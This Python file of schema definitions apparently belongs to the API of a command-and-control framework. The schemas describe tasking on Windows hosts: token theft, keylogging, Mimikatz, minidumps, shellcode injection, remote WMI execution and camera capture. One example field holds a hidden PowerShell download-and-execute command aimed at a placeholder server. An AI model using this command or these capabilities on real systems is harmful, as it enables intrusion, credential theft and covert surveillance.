        example="C:\\Windows\\service.exe",
        title="Command",
    )


@autocomplete
class ServiceDeleteArguments(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    service: str = Field(..., description="Service name", example="spoolsv", title="Service")


class ServiceErrorControl(str, Enum):
    error_ignore = "error_ignore"
    error_normal = "error_normal"
    error_severe = "error_severe"
    error_critical = "error_critical"


@autocomplete
class ServiceQueryArguments(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    service: str = Field(..., description="Service name", example="spoolsv", title="Service")


@autocomplete
class ServiceStartArguments(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    service: str = Field(..., description="Service name", example="spoolsv", title="Service")


class ServiceStartType(str, Enum):
    boot_start = "boot_start"
    system_start = "system_start"
    auto_start = "auto_start"
    demand_start = "demand_start"
    disabled = "disabled"


class ServiceState(str, Enum):
    continue_pending = "continue_pending"
    pause_pending = "pause_pending"
    paused = "paused"
    running = "running"
    start_pending = "start_pending"
    stop_pending = "stop_pending"
    stopped = "stopped"


@autocomplete
class ServiceStopArguments(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    service: str = Field(..., description="Service name", example="spoolsv", title="Service")


class ServiceType(str, Enum):
    kernel_driver = "kernel_driver"
    file_system_driver = "file_system_driver"
    adapter = "adapter"
    recognizer_driver = "recognizer_driver"
    win32_own_process = "win32_own_process"
    win32_share_process = "win32_share_process"
    user_own_process = "user_own_process"
    user_share_process = "user_share_process"
    interactive_process = "interactive_process"


@autocomplete
class SessionDetails(Schema):
    username: str = Field(..., description="Session username", example="Jason", title="Username")
    source: str = Field(..., description="Source hostname", example="SOURCE-PC", title="Source")
    active: int = Field(..., description="Active time in minutes", example=30, title="Active")
    idle: int = Field(..., description="Idle time in minutes", example=15, title="Idle")


@autocomplete
class ShareAddArguments(Schema):
    path: str = Field(..., description="UNC path to map", example="\\\\REMOTE\\C$", title="Path")
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\John",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )


@autocomplete
class ShareDeleteArguments(Schema):
    share: str = Field(..., description="Mapped share name", example="\\\\REMOTE\\C$", title="Share")


class ShareDisplayType(str, Enum):
    generic = "generic"
    domain = "domain"
    server = "server"
    share = "share"
    file = "file"
    group = "group"
    network = "network"
    root = "root"
    share_admin = "share_admin"
    directory = "directory"


@autocomplete
class ShareListArguments(Schema):
    pass


class ShareScope(str, Enum):
    connected = "connected"
    globalnet = "globalnet"
    remembered = "remembered"
    recent = "recent"
    context = "context"


class ShareType(str, Enum):
    any = "any"
    disk = "disk"
    print = "print"
    reserved = "reserved"
    unknown = "unknown"


@autocomplete
class SrdiConversionArguments(Schema):
    srdi_exported_function: Optional[str] = Field(
        "none",
        alias="srdiExportedFunction",
        description="Exported function to execute post load [sRDI]",
        example="MyExport",
        title="Srdiexportedfunction",
    )
    srdi_user_data: Optional[BlobReferenceOrData] = Field(
        {"id": "null"},
        alias="srdiUserData",
        description="User data to pass to exported function [sRDI]",
        example="user_data",
        title="Srdiuserdata",
    )
    srdi_flags: Optional[int] = Field(
        0,
        alias="srdiFlags",
        description="Configuration flags for loading process [sRDI]",
        title="Srdiflags",
    )


class StdioType(str, Enum):
    out = "out"
    error = "error"


@autocomplete
class TaskArguments(Schema):
    pass


class TaskContext(str, Enum):
    system = "system"
    user = "user"
    script = "script"


class TaskDelivery(str, Enum):
    invalid = "invalid"
    queued = "queued"
    delivered = "delivered"
    in_progress = "in_progress"
    completed = "completed"
    blocked = "blocked"


@autocomplete
class TaskErrorInfo(Schema):
    code: Optional[int] = Field(None, title="Code")
    description: Optional[str] = Field(None, title="Description")
    os_code: Optional[int] = Field(None, alias="osCode", title="Oscode")
    os_description: Optional[str] = Field(None, alias="osDescription", title="Osdescription")


@autocomplete
class TaskInfo(Schema):
    path: str = Field(..., title="Path")
    state: ScheduledTaskState = Field(...)
    last_run: str = Field(..., alias="lastRun", title="Lastrun")
    last_result: int = Field(..., alias="lastResult", title="Lastresult")
    xml: str = Field(..., title="Xml")


@autocomplete
class TaskResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )

    class Config:
        extra = "allow"


class TaskStatus(str, Enum):
    unknown = "unknown"
    success = "success"
    failure = "failure"
    warning = "warning"
    critical = "critical"


@autocomplete
class TicketInResponse(Schema):
    ticket: str = Field(..., title="Ticket")
    expires_in: int = Field(..., alias="expiresIn", title="Expiresin")
    expires_at: datetime = Field(..., alias="expiresAt", title="Expiresat")


class TimeFormat(str, Enum):
    access = "access"
    create = "create"
    write = "write"


class TokenIntegrity(str, Enum):
    untrusted = "untrusted"
    low = "low"
    medium = "medium"
    medium_plus = "medium_plus"
    high = "high"
    system = "system"
    protected = "protected"
    secure = "secure"


@autocomplete
class TokenLogonArguments(Schema):
    username: str = Field(
        ...,
        description="Account username (Accepts 'domain\\user' format)",
        title="Username",
    )
    password: str = Field(..., description="Account password", title="Password")
    netonly: Optional[bool] = Field(
        False,
        description="Use a NETONLY logon type to skip local credential validation",
        title="Netonly",
    )
    store: Optional[bool] = Field(
        False,
        description="Store the token for internal use and do not apply it to the current thread impersonate",
        title="Store",
    )


@autocomplete
class TokenLogonResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class TokenPrivilegesArguments(Schema):
    pass


@autocomplete
class TokenPrivilegesResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    privileges: Optional[List[SePrivilege]] = Field(
        [],
        description="Privileges successfully enabled for the current token",
        example=["SeDebugPrivilege", "SeShutdownPrivilege"],
    )


@autocomplete
class TokenRevertArguments(Schema):
    pass


@autocomplete
class TokenRevertResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class TokenStealArguments(Schema):
    process: str = Field(
        ...,
        description="Target process (name or id) for performing token duplication",
        title="Process",
    )


@autocomplete
class TokenStealResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class Tool(str, Enum):
    slingshot = "slingshot"
    throwback = "throwback"
    downlink = "downlink"


@autocomplete
class TransactionInResponse(Schema):
    id: UUID = Field(..., title="Id")
    created_at: datetime = Field(..., alias="createdAt", title="Createdat")
    tool: Tool = Field(...)
    protocol: Protocol = Field(...)
    source: Optional[str] = Field(None, max_length=256, title="Source")
    destination: Optional[str] = Field(None, max_length=256, title="Destination")
    details: Optional[Dict[str, Any]] = Field(None, title="Details")
    instance_id: Optional[UUID] = Field(None, alias="instanceId", title="Instanceid")


@autocomplete
class UserInChangePassword(Schema):
    old_password: str = Field(..., alias="oldPassword", max_length=100, title="Oldpassword")
    new_password: str = Field(..., alias="newPassword", max_length=100, title="Newpassword")


class UserRole(str, Enum):
    admin = "admin"
    operator = "operator"
    observer = "observer"


@autocomplete
class ValidationError(Schema):
    loc: List[str] = Field(..., title="Location")
    msg: str = Field(..., title="Message")
    type: str = Field(..., title="Error Type")


@autocomplete
class WmiArgumentBase(Schema):
    machine: Optional[str] = Field(
        "localhost",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    namespace: Optional[str] = Field(
        "ROOT\\CIMV2",
        description="Wmi target namespace",
        example="ROOT\\CIMV2",
        title="Namespace",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    authority: Optional[str] = Field(
        "",
        description="Authentication authority",
        example="Kerberos:ACME\\HostA",
        title="Authority",
    )


@autocomplete
class WmiInstanceCallArguments(Schema):
    machine: Optional[str] = Field(
        "localhost",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    namespace: Optional[str] = Field(
        "ROOT\\CIMV2",
        description="Wmi target namespace",
        example="ROOT\\CIMV2",
        title="Namespace",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    authority: Optional[str] = Field(
        "",
        description="Authentication authority",
        example="Kerberos:ACME\\HostA",
        title="Authority",
    )
    filter: str = Field(
        ...,
        description="WQL filter string",
        example="Select * from Win32_OperatingSystem",
        title="Filter",
    )
    method: str = Field(..., description="Method name", example="Create", title="Method")
    parameters: Dict[str, Any] = Field(
        ...,
        description="Method parameters",
        example={"CommandLine": "C:\\Windows\\System32\\cmd.exe"},
        title="Parameters",
    )


@autocomplete
class WmiInstanceCallResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    results: Optional[List[Dict[str, Any]]] = Field(
        [{}],
        description="Wmi results",
        example=[
            {
                "BootDevice": "\\Device\\HarddiskVolume5",
                "BuildNumber": 17134,
                "BuildType": "Multiprocessor Free",
                "Caption": "Microsoft Windows 10 Pro",
                "CodeSet": 1252,
            }
        ],
        title="Results",
    )


@autocomplete
class WmiProcessCreateArguments(Schema):
    machine: Optional[str] = Field(
        "localhost",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    namespace: Optional[str] = Field(
        "ROOT\\CIMV2",
        description="Wmi target namespace",
        example="ROOT\\CIMV2",
        title="Namespace",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    authority: Optional[str] = Field(
        "",
        description="Authentication authority",
        example="Kerberos:ACME\\HostA",
        title="Authority",
    )
    command: str = Field(
        ...,
        description="Command line string",
        example="C:\\Windows\\System32\\cmd.exe /C ipconfig",
        title="Command",
    )


@autocomplete
class WmiProcessCreateResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    results: Optional[List[Dict[str, Any]]] = Field(
        [{}],
        description="Wmi results",
        example=[
            {
                "BootDevice": "\\Device\\HarddiskVolume5",
                "BuildNumber": 17134,
                "BuildType": "Multiprocessor Free",
                "Caption": "Microsoft Windows 10 Pro",
                "CodeSet": 1252,
            }
        ],
        title="Results",
    )


@autocomplete
class WmiQueryArguments(Schema):
    machine: Optional[str] = Field(
        "localhost",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    namespace: Optional[str] = Field(
        "ROOT\\CIMV2",
        description="Wmi target namespace",
        example="ROOT\\CIMV2",
        title="Namespace",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    authority: Optional[str] = Field(
        "",
        description="Authentication authority",
        example="Kerberos:ACME\\HostA",
        title="Authority",
    )
    filter: str = Field(
        ...,
        description="WQL filter string",
        example="Select * from Win32_OperatingSystem",
        title="Filter",
    )


@autocomplete
class WmiQueryResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    results: Optional[List[Dict[str, Any]]] = Field(
        [{}],
        description="Wmi results",
        example=[
            {
                "BootDevice": "\\Device\\HarddiskVolume5",
                "BuildNumber": 17134,
                "BuildType": "Multiprocessor Free",
                "Caption": "Microsoft Windows 10 Pro",
                "CodeSet": 1252,
            }
        ],
        title="Results",
    )


@autocomplete
class WmiResultsBase(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    results: Optional[List[Dict[str, Any]]] = Field(
        [{}],
        description="Wmi results",
        example=[
            {
                "BootDevice": "\\Device\\HarddiskVolume5",
                "BuildNumber": 17134,
                "BuildType": "Multiprocessor Free",
                "Caption": "Microsoft Windows 10 Pro",
                "CodeSet": 1252,
            }
        ],
        title="Results",
    )


@autocomplete
class WmiStaticCallArguments(Schema):
    machine: Optional[str] = Field(
        "localhost",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    namespace: Optional[str] = Field(
        "ROOT\\CIMV2",
        description="Wmi target namespace",
        example="ROOT\\CIMV2",
        title="Namespace",
    )
    username: Optional[str] = Field(
        "",
        description="Username for authentication",
        example="ACME\\Jason",
        title="Username",
    )
    password: Optional[str] = Field(
        "",
        description="Password for authentication",
        example="Password1",
        title="Password",
    )
    authority: Optional[str] = Field(
        "",
        description="Authentication authority",
        example="Kerberos:ACME\\HostA",
        title="Authority",
    )
    class_: str = Field(
        ...,
        alias="class",
        description="Full class name",
        example="Win32_Process",
        title="Class",
    )
    method: str = Field(..., description="Method name", example="Create", title="Method")
    parameters: Dict[str, Any] = Field(
        ...,
        description="Method parameters",
        example={"CommandLine": "C:\\Windows\\System32\\cmd.exe"},
        title="Parameters",
    )


@autocomplete
class WmiStaticCallResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    results: Optional[List[Dict[str, Any]]] = Field(
        [{}],
        description="Wmi results",
        example=[
            {
                "BootDevice": "\\Device\\HarddiskVolume5",
                "BuildNumber": 17134,
                "BuildType": "Multiprocessor Free",
                "Caption": "Microsoft Windows 10 Pro",
                "CodeSet": 1252,
            }
        ],
        title="Results",
    )


@autocomplete
class CameraCaptureResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    data: Optional[BlobReferenceOrData] = Field(
        {"id": "null"},
        description="JPEG data from camera",
        example="EXAMPLE_JPEG",
        title="Data",
    )


@autocomplete
class CameraListResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    cameras: Optional[List[Camera]] = Field(
        [],
        description="List of available cameras",
        example=[{"id": 1, "name": "Logitech C120"}],
        title="Cameras",
    )


@autocomplete
class ContextIdleResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    minutes: Optional[int] = Field(
        0,
        description="Minutes the current user session has been idle",
        example=15,
        title="Minutes",
    )


@autocomplete
class ContextProcessResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    process_id: Optional[int] = Field(
        0,
        alias="processId",
        description="Current process id",
        example=1234,
        title="Processid",
    )
    architecture: Optional[Architecture] = Field("x64", description="Current process architecture", example="x64")
    path: Optional[str] = Field(
        "",
        description="Process binary path",
        example="C:\\Software\\Slingshot.exe",
        title="Path",
    )
    user_id: Optional[str] = Field(
        "",
        alias="userId",
        description="Token domain and username",
        example="ACME\\Jason",
        title="Userid",
    )


@autocomplete
class ContextUserResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    domain: Optional[str] = Field("", description="Token domain name", example="ACME", title="Domain")
    username: Optional[str] = Field("", description="Token user name", example="Jason", title="Username")
    netonly: Optional[bool] = Field(False, description="NETWORK_ONLY logon type", example=False, title="Netonly")
    sid: Optional[str] = Field(
        None,
        description="Security identifier",
        example="S-1-5-21-559599230-1559177840-3308743733-1004",
        title="Sid",
    )
    integrity: Optional[TokenIntegrity] = Field(None, description="Token integrity", example="medium")


@autocomplete
class EncodingArgument(Schema):
    encoding: Optional[HostingEncoding] = Field("base64", description="Encoding for binary data", example="base64")


@autocomplete
class ExitResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class FileChangeDirectoryResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    directory: Optional[str] = Field("", description="Current directory", example="C:\\Users", title="Directory")


@autocomplete
class FileCopyResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class FileDownloadResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    data: Optional[BlobReferenceOrData] = Field(
        {"id": "null"},
        description="File data from remote filesystem",
        example="EXAMPLE_DATA",
        title="Data",
    )


@autocomplete
class FileListArguments(Schema):
    directory: Optional[str] = Field(
        ".\\",
        description="Directory path (supports environment variables)",
        example="C:\\Windows",
        title="Directory",
    )
    time_format: Optional[TimeFormat] = Field(
        "access",
        alias="timeFormat",
        description="Time detail to request",
        example="access",
    )


@autocomplete
class FileListResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    entries: Optional[List[FileOrDirectory]] = Field(
        [],
        description="Directory entires",
        example=[
            {"name": "Windows", "isDir": True, "time": "2000-01-02T03:04:05"},
            {"name": "System32", "isDir": True, "time": "2000-01-02T03:04:05"},
            {
                "name": "root.dat",
                "isDir": False,
                "time": "2000-01-02T03:04:05",
                "size": 7344321,
            },
            {
                "name": "page.sys",
                "isDir": False,
                "time": "2000-01-02T03:04:05",
                "size": 5134,
            },
        ],
        title="Entries",
    )


@autocomplete
class FileMakeDirectoryResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class FileMoveResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class FileRemoveDirectoryResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class FileRemoveResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class FileUploadResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class HTTPValidationError(Schema):
    detail: Optional[List[ValidationError]] = Field(None, title="Detail")


@autocomplete
class HostFileArguments(Schema):
    encoding: Optional[HostingEncoding] = Field("base64", description="Encoding for binary data", example="base64")
    base_url: Optional[str] = Field(
        "",
        alias="baseUrl",
        description="Base URL (default is from profile)",
        example="http://mycustom.com",
        title="Baseurl",
    )
    endpoint: str = Field(
        ...,
        description="Web endpoint path to host data",
        example="/custom",
        title="Endpoint",
    )
    data: BlobReferenceOrData = Field(..., description="Data or blob to host", title="Data")


@autocomplete
class HostFileResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    url: Optional[str] = Field(
        "",
        description="Final URL path for hosting",
        example="http://server.com/sub/path",
        title="Url",
    )


@autocomplete
class HostPowershellResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    command: Optional[str] = Field(
        "",
        description="Command line for execution",
        example="powershell.exe -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://server.com/sub/path'))\"",
        title="Command",
    )


@autocomplete
class HostShellcodeResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    url: Optional[str] = Field(
        "",
        description="Final URL path for hosting",
        example="http://server.com/sub/path",
        title="Url",
    )


@autocomplete
class HostUnloadResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class InfoResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    machine_name: Optional[str] = Field(
        "",
        alias="machineName",
        description="Machine hostname",
        example="EXAMPLE-PC",
        title="Machinename",
    )
    architecture: Optional[str] = Field(
        "",
        description="Current process architecture",
        example="x64",
        title="Architecture",
    )
    os_version: Optional[str] = Field(
        "",
        alias="osVersion",
        description="Operating system version",
        example="10.0.19041 [10 20H1]",
        title="Osversion",
    )
    user_id: Optional[str] = Field(
        "",
        alias="userId",
        description="Token domain and username",
        example="ACME\\John",
        title="Userid",
    )


@autocomplete
class InjectResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class InstanceInResponse(Schema):
    id: UUID = Field(..., title="Id")
    tool: Tool = Field(...)
    tag: str = Field(..., max_length=50, title="Tag")
    name: str = Field(..., max_length=100, title="Name")
    hidden: bool = Field(..., title="Hidden")
    updated_at: datetime = Field(..., alias="updatedAt", title="Updatedat")
    created_at: datetime = Field(..., alias="createdAt", title="Createdat")
    machine_name: str = Field(..., alias="machineName", max_length=256, title="Machinename")
    architecture: str = Field(..., max_length=100, title="Architecture")
    os_name: str = Field(..., alias="osName", max_length=100, title="Osname")
    os_version: str = Field(..., alias="osVersion", max_length=100, title="Osversion")
    context: str = Field(..., max_length=256, title="Context")
    user_name: str = Field(..., alias="userName", max_length=256, title="Username")
    last_transaction: Optional[TransactionInResponse] = Field(None, alias="lastTransaction")
    routes: Optional[List[RouteInResponse]] = Field([], title="Routes")


@autocomplete
class KerberosLoadResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class KerberosPurgeResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class KeylogGatherResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    keylog: Optional[BlobReferenceOrData] = Field(
        {"id": "null"},
        description="Raw captured keystroke data",
        example="EXAMPLE_KEYLOG_DATA",
        title="Keylog",
    )


@autocomplete
class LinkResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    discovered: Optional[List[DiscoveredInstance]] = Field(
        [],
        description="Discovered instance from the link attempt",
        example=[{"path": "mypipe1", "tag": "jPc4dpYI"}],
        title="Discovered",
    )


@autocomplete
class ManagedModuleExecuteResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    output: Optional[str] = Field(
        "",
        description="Output from native module",
        example="Custom output string",
        title="Output",
    )


@autocomplete
class ManagedModuleLoadResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class ManagedModuleResultsBase(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class ManagedModuleUnloadResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class MimikatzExecuteResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    output: Optional[str] = Field(
        "",
        description="Output from Mimikatz module",
        example="mimikatz 2.1.1 (arch x64)\nWindows NT 10.0 build 2657 (arch x64)\nmsvc 190024215 1",
        title="Output",
    )


@autocomplete
class MimikatzLoadResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class MimikatzResultsBase(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class MinidumpResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class NativeModuleExecuteResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    output: Optional[str] = Field(
        "",
        description="Output from native module",
        example="Custom output string!",
        title="Output",
    )


@autocomplete
class NativeModuleLoadResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class NativeModuleResultsBase(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class NativeModuleUnloadResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class NetworkConnectResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    hosts: Optional[List[str]] = Field(
        [],
        description="List of hosts in which connections succeeded",
        example=["192.168.1.5", "192.168.1.6"],
        title="Hosts",
    )


@autocomplete
class NetworkEnumerateSessionResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    sessions: Optional[List[SessionDetails]] = Field(
        [],
        description="List of session details",
        example=[{"username": "Jason", "source": "SOURCE-PC", "active": 30, "idle": 15}],
        title="Sessions",
    )


@autocomplete
class NetworkPingResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class NetworkResolveResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    dns_name: Optional[str] = Field(
        None,
        alias="dnsName",
        description="Address provided via DNS resolution",
        example="1.2.3.4",
        title="Dnsname",
    )
    nbns_name: Optional[str] = Field(
        None,
        alias="nbnsName",
        description="Address provided via NetBIOS resolution",
        example="1.2.3.4",
        title="Nbnsname",
    )


@autocomplete
class PayloadBase(Schema):
    tool: Tool = Field(..., description="Tool identifier")
    name: str = Field(..., description="Payload name", title="Name")


@autocomplete
class PayloadCacheInfo(Schema):
    status: PayloadCacheStatus
    auth_url: Optional[str] = Field(
        None,
        alias="authUrl",
        description="URL to finish device flow authentication",
        title="Authurl",
    )


@autocomplete
class PayloadSeed(Schema):
    tool: Tool = Field(..., description="Tool identifier")
    name: str = Field(..., description="Payload name", title="Name")
    profile: Optional[UUID] = Field(
        None,
        description="C2 profile to use (otherwise derive from current instance)",
        title="Profile",
    )


@autocomplete
class PayloadWithData(Schema):
    tool: Tool = Field(..., description="Tool identifier")
    name: str = Field(..., description="Payload name", title="Name")
    version: str = Field(..., description="Tool version", title="Version")
    cached: datetime = Field(..., description="Payload cache time", title="Cached")
    ext: str = Field(..., description="Original payload extension", title="Ext")
    data: bytes = Field(..., description="Raw payload bytes", title="Data")


@autocomplete
class PayloadWithMetadata(Schema):
    tool: Tool = Field(..., description="Tool identifier")
    name: str = Field(..., description="Payload name", title="Name")
    version: str = Field(..., description="Tool version", title="Version")
    cached: datetime = Field(..., description="Payload cache time", title="Cached")


@autocomplete
class PowershellBaseResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class PowershellExecuteResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    output: Optional[str] = Field(
        "",
        description="Output from Powershell module",
        example="\nName             : ConsoleHost\nVersion          : 5.1.19041.610\nInstanceId       : 0484e4be-534a-4b4d-9ec2-a39109fbb490\n",
        title="Output",
    )


